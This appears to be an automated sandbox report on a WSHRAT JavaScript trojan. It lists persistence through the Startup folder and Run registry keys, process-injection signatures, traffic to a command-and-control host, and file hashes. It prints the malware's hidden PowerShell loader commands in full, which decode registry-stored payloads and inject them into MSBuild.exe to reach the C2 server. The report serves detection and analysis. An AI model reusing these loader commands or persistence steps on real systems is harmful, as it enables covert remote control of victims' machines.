Malware Analysis Report

2025-04-14 08:27

Sample ID: 211210-c1v1sagdhp
Target: launcher service.js
SHA256: 6774ae9c26be549fc9096af5859d3e1614b2ce6993fde4ee85b7301134161411
Tags: wshrat persistence suricata trojan
Score: 10/10

Analysis Overview

score
10/10

SHA256

6774ae9c26be549fc9096af5859d3e1614b2ce6993fde4ee85b7301134161411

Threat Level: Known bad

The file launcher service.js was found to be: Known bad.

Malicious Activity Summary

wshrat persistence suricata trojan

WSHRAT

suricata: ET MALWARE WSHRAT CnC Checkin

suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1

Blocklisted process makes network request

Drops startup file

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Script User-Agent

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Analysis: static1

Detonation Overview

Reported

2021-12-10 02:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-12-10 02:33

Reported

2021-12-10 02:35

Platform

win7-en-20211208

Max time kernel

147s

Max time network

148s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\launcher service.js"

Signatures

WSHRAT

trojan wshrat

suricata: ET MALWARE WSHRAT CnC Checkin

suricata

suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1

suricata

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js | C:\Windows\system32\wscript.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js | C:\Windows\System32\wscript.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\system32\wscript.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\System32\wscript.exe | N/A
Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\System32\wscript.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\system32\wscript.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 880 set thread context of 1672 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Enumerates physical storage devices

Script User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header (recorded 26 times) | "WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands" | N/A | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege (recorded 3 times) | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A (recorded 2 times) | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1192 wrote to memory of 760 (recorded 3 times) | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe
PID 760 wrote to memory of 1876 (recorded 3 times) | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 1664 (recorded 3 times) | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 880 (recorded 3 times) | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 880 wrote to memory of 1672 (recorded 10 times) | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\launcher service.js"

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\launcher service.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'ben738sj11xz.mywire.org 5478 \"WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

path ben738sj11xz.mywire.org 5478 "WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands" 1

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | ip-api.com | udp
US | 208.95.112.1:80 | ip-api.com | tcp
US | 8.8.8.8:53 | ben738sj11xz.mywire.org | udp
US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp (26 identical connections)

Files

memory/760-54-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\launcher service.js

MD5 8dce2fac1cdb56ef997f0c4f8065f82e
SHA1 da01f70d7035a8e8421d2296c7b481dc6dcb2b09
SHA256 6774ae9c26be549fc9096af5859d3e1614b2ce6993fde4ee85b7301134161411
SHA512 cb622198fee5d9810e6762f82c78da1a3868b1b67061d788b1af124f6f39456de73b7ba90452098983ff32762f28d471b1c546d228a393cf7364e1babfaac6a3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js

MD5 56cc519ca00b696dd0d9d838a9df6149
SHA1 bfcce8ca529830cc108ab0dfdb68fe7f28892fc2
SHA256 c603708f2f3ed06b04977c58aa125455c22420655f59f37f0b52d99bc70a09c0
SHA512 61c9d8dba7e20f3f3af3e95fb6ed86e6ee9ebb214f6eb97bfeb38fc66bbd35b1b7af70773ab99f3f33c5f47524d0075de0c07cc4024a59182c8fb10434be5ca5

memory/1876-57-0x0000000000000000-mapping.dmp

memory/1876-58-0x000007FEFBAB1000-0x000007FEFBAB3000-memory.dmp

memory/1876-60-0x00000000023C0000-0x00000000023C2000-memory.dmp

memory/1876-61-0x00000000023C2000-0x00000000023C4000-memory.dmp

memory/1876-62-0x00000000023C4000-0x00000000023C7000-memory.dmp

memory/1876-59-0x000007FEF27B0000-0x000007FEF330D000-memory.dmp

memory/1876-63-0x00000000023CB000-0x00000000023EA000-memory.dmp

memory/1664-64-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 2f456a2e7614bd05f70e38f44de562e8
SHA1 a178d6029bf058155afe0a1189f272df8e8f501e
SHA256 b1445efff6c939d9b31332af4721d3d9e859b195d663931f5a9851abe336cb04
SHA512 bb34e25ae60da30aa0c9bff74678b127ba9cad85f4bcbe46ba93d06ecba14e975ad978b50a75260134d67f105e42a1d37a363148041dab9ac713a3131a75b01e

memory/1664-67-0x000007FEF2740000-0x000007FEF329D000-memory.dmp

memory/1664-68-0x0000000002560000-0x0000000002562000-memory.dmp

memory/1664-70-0x0000000002564000-0x0000000002567000-memory.dmp

memory/1664-69-0x0000000002562000-0x0000000002564000-memory.dmp

memory/1664-71-0x000000001B730000-0x000000001BA2F000-memory.dmp

memory/1664-72-0x000000000256B000-0x000000000258A000-memory.dmp

memory/880-73-0x0000000000000000-mapping.dmp

memory/880-76-0x000007FEF27B0000-0x000007FEF330D000-memory.dmp

memory/880-77-0x0000000002740000-0x0000000002742000-memory.dmp

memory/880-79-0x0000000002744000-0x0000000002747000-memory.dmp

memory/880-78-0x0000000002742000-0x0000000002744000-memory.dmp

memory/880-80-0x000000001B700000-0x000000001B9FF000-memory.dmp

memory/1672-81-0x0000000000400000-0x000000000040E000-memory.dmp

memory/1672-82-0x0000000000400000-0x000000000040E000-memory.dmp

memory/1672-83-0x0000000000400000-0x000000000040E000-memory.dmp

memory/1672-84-0x0000000000400000-0x000000000040E000-memory.dmp

memory/1672-85-0x0000000000400000-0x000000000040E000-memory.dmp

memory/1672-86-0x0000000000400000-0x000000000040E000-memory.dmp

memory/1672-87-0x00000000004071AE-mapping.dmp

memory/880-88-0x000000000274B000-0x000000000276A000-memory.dmp

memory/1672-89-0x0000000074EC1000-0x0000000074EC3000-memory.dmp

memory/1672-90-0x0000000000370000-0x0000000000371000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-12-10 02:33

Reported

2021-12-10 02:35

Platform

win10-en-20211208

Max time kernel

150s

Max time network

155s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\launcher service.js"

Signatures

WSHRAT

trojan wshrat

suricata: ET MALWARE WSHRAT CnC Checkin

suricata

suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1

suricata

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js | C:\Windows\system32\wscript.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js | C:\Windows\System32\wscript.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\System32\wscript.exe | N/A
Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\System32\wscript.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\system32\wscript.exe | N/A
Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\system32\wscript.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 864 set thread context of 2160 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Script User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header (recorded 27 times) | "WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands" | N/A | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege (recorded 3 times) | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A (recorded 2 times) | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3372 wrote to memory of 3436 (recorded 2 times) | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe
PID 3436 wrote to memory of 4304 (recorded 2 times) | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3436 wrote to memory of 3264 (recorded 2 times) | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3436 wrote to memory of 864 (recorded 2 times) | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 864 wrote to memory of 2160 (recorded 9 times) | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\launcher service.js"

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\launcher service.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'ben738sj11xz.mywire.org 5478 \"WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

path ben738sj11xz.mywire.org 5478 "WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands" 1

Network

Country  Destination          Domain                   Proto
US       52.109.12.18:443                              tcp
US       8.8.8.8:53           ip-api.com               udp
US       208.95.112.1:80      ip-api.com               tcp
US       8.8.8.8:53           ben738sj11xz.mywire.org  udp
US       107.172.73.191:5478  ben738sj11xz.mywire.org  tcp
DE       23.51.123.27:80                               tcp

Files

C:\Users\Admin\AppData\Roaming\launcher service.js

MD5 8dce2fac1cdb56ef997f0c4f8065f82e
SHA1 da01f70d7035a8e8421d2296c7b481dc6dcb2b09
SHA256 6774ae9c26be549fc9096af5859d3e1614b2ce6993fde4ee85b7301134161411
SHA512 cb622198fee5d9810e6762f82c78da1a3868b1b67061d788b1af124f6f39456de73b7ba90452098983ff32762f28d471b1c546d228a393cf7364e1babfaac6a3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js

MD5 28d4b39c5ab839e66afd24b3789e28c7
SHA1 1e13f0ff2bcfcbf04b6ed9e6225d5772a3b5bb13
SHA256 c3a8a50de9d7aa5142a35612187d9f315134420f36310b18a4da7dbf4826a0aa
SHA512 27b95b87cbe1d8b602df02a95e3ed3e7737a5adfc94d903ea95ecce501a569ef582bc370911b35c1c48ab90a93ad3fea340bf017f2e032607230b52c188be51b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8a313b70fd641fc4e6fffb40391d0b4d
SHA1 22684fe19ecd7943ac18e622db0d7f161db500e8
SHA256 bd33eb064e32cf8d9af160e3304d3f0e1b90bdc9ab5116c16ba87d9a14060911
SHA512 5b72cd7e301ad3825bf1465840f52abb885c2481700df5dfa299c30aa6b61613dac8fc1386895cffec48b8229cba77085f672a80e42d7fd07c73eafd962e1246

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dbbeee3c97557a70459b6d579e0d23bf
SHA1 00e30dbe674d7c561da954a7059a719f864fcdde
SHA256 503b948d4073ee324fb320d16c13e589b8aee0f6c254c5c9e4c52b3d4b4d48e7
SHA512 dde59ef8c9b4e948ceab50389a8d4d4677596038c217f80270c8e8ace209e80bbe35984c9168c0040f67a78bb58c6c9ca5ebc5d242e4c1027c83bbfeffecbc09

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 98cd985d8372e4230d6f0ff9af003fd0
SHA1 d6b538603d60624cfd00404d141eab9e50025c7f
SHA256 e05e0f99f07a63bd7943f876777e10e4600536aecbfc184d51c33e69a1900a32
SHA512 56d2e322cdfdb7eae5244999faf30a4c16b95e7461cef5d0b8b2518ff06db7b6ed01c7a822b99a566126ee6265ce0c698d5d276302fcf0bd74ed8ccbab25c01e
